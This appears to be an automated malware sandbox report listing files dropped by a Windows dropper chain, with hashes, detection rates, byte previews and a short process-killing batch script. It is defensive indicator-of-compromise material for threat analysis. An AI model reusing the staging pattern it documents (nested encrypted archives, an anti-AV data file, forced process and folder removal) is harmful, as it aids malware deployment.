SHA-256:	3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
SHA-512:	1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	776832
Entropy (8bit):	7.859727158445845
Encrypted:	false
SSDEEP:	12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5:	AFD936E441BF5CBDB858E96833CC6ED3
SHA1:	3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:	C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:	928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4471808
Entropy (8bit):	7.9838022177302985
Encrypted:	false
SSDEEP:	98304:oSEoarpcKNd0dJtR8gPw6hDc+xDhsCiz1S0MKj:oSE31cKNOdJsH6blhsS0fj
MD5:	A326CDB677DE0DFFBC5BEB2970B80AC0
SHA1:	12A8073306783FEAC1F97686572460C2220ED0FF
SHA-256:	EA4851D1A1AEBE61B573032D1785DF907AF31DD39343ED48D03BBF58830AB45C
SHA-512:	D1B1B98051608A0EB4F7690A0C93B9C0C8F29082069CFA955389487D557280E3A3A49243AD66E7AE36C020469973CF7580F92CFA33D5059A8B68C2411BD1576C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...@.......PD...@..........................p......IrD...@... ............................._.a.s.....a.....................................................X....................................................... . .pa......>(.................@....rsrc.........a......N(.............@....idata ......a......P(.............@... ..8...a......R(.............@...pxmrbptw.....`.......T(.............@...trmdtetf.....0........D.............@....taggant.0...@..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4438776
Entropy (8bit):	7.99505709582503
Encrypted:	true
SSDEEP:	98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:	3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:	7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:	BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:	A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...\|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wppbwyn.1ls.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qitcwvzv.efo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953216
Entropy (8bit):	6.566738977915864
Encrypted:	false
SSDEEP:	49152:OpbqeFpPw4cvv9mgxIGSapA/tQzph1LqNVwS+3ctv:Opb3bwhvv9mRapEuzp2NqSeU
MD5:	157E44350B06A516680ED7B7584C5E31
SHA1:	FC08A1BCCBEF19FC0C60BE65C939ECD344C28D96
SHA-256:	09BAE49E2D08D3316490B621A37FA44EC46EB894133664FFFB2B6202E7364C94
SHA-512:	2B362A144AA0304CBAF890E6A2E63BA7F962F3772D4F74AE5C3AF469466DF6F5C3ED6C4BF409A5849CC6F1DCE5E7CD56FD62EF1D692D4722035BC0C1C699BEDA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0......\-...@.................................W...k.............................0.............................\.0..................................................... . ............................@....rsrc...............................@....idata ............................@...kkeyqygg..*.......).................@...nkvdmfgh......0.......,.............@....taggant.0....0.."....,.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\main\7z.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2355713
Entropy (8bit):	5.891648193754473
Encrypted:	false
SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
MD5:	579A63BEBCCBACAB8F14132F9FC31B89
SHA1:	FCA8A51077D352741A9C1FF8A493064EF5052F27
SHA-256:	0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
SHA-512:	4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
Malicious:	false
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1799594
Entropy (8bit):	7.99773141173711
Encrypted:	true
SSDEEP:	49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
MD5:	5659EBA6A774F9D5322F249AD989114A
SHA1:	4BFB12AA98A1DC2206BAA0AC611877B815810E4C
SHA-256:	E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
SHA-512:	F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
Malicious:	false
Preview:	PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799748
Entropy (8bit):	7.997729415613798
Encrypted:	true
SSDEEP:	49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
MD5:	5404286EC7853897B3BA00ADF824D6C1
SHA1:	39E543E08B34311B82F6E909E1E67E2F4AFEC551
SHA-256:	EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
SHA-512:	C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
Malicious:	false
Preview:	PK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1799902
Entropy (8bit):	7.997726708945573
Encrypted:	true
SSDEEP:	49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
MD5:	5EB39BA3698C99891A6B6EB036CFB653
SHA1:	D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
SHA-256:	E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
SHA-512:	6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
Malicious:	false
Preview:	PK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800056
Entropy (8bit):	7.997723543142523
Encrypted:	true
SSDEEP:	49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
MD5:	7187CC2643AFFAB4CA29D92251C96DEE
SHA1:	AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
SHA-256:	C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
SHA-512:	27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
Malicious:	false
Preview:	PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800210
Entropy (8bit):	7.997720745184939
Encrypted:	true
SSDEEP:	49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
MD5:	B7D1E04629BEC112923446FDA5391731
SHA1:	814055286F963DDAA5BF3019821CB8A565B56CB8
SHA-256:	4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
SHA-512:	79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
Malicious:	false
Preview:	PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1800364
Entropy (8bit):	7.997716835838842
Encrypted:	true
SSDEEP:	49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
MD5:	0DC4014FACF82AA027904C1BE1D403C1
SHA1:	5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
SHA-256:	A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
SHA-512:	CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
Malicious:	false
Preview:	PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..YC.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^...T.-f..$k.b..#&.B.v...s.s....{.......{..\|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s\|&Fj..T:.m...J..sk..t.\K]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y.;ol..&_/./....3........x.%....$..=.^}.}..53.....\|...\|-... #..Z-.b.Ej...q.u..

C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3473559
Entropy (8bit):	7.9992359395959935
Encrypted:	true
SSDEEP:	98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
MD5:	CEA368FC334A9AEC1ECFF4B15612E5B0
SHA1:	493D23F72731BB570D904014FFDACBBA2334CE26
SHA-256:	07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
SHA-512:	BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
Malicious:	false
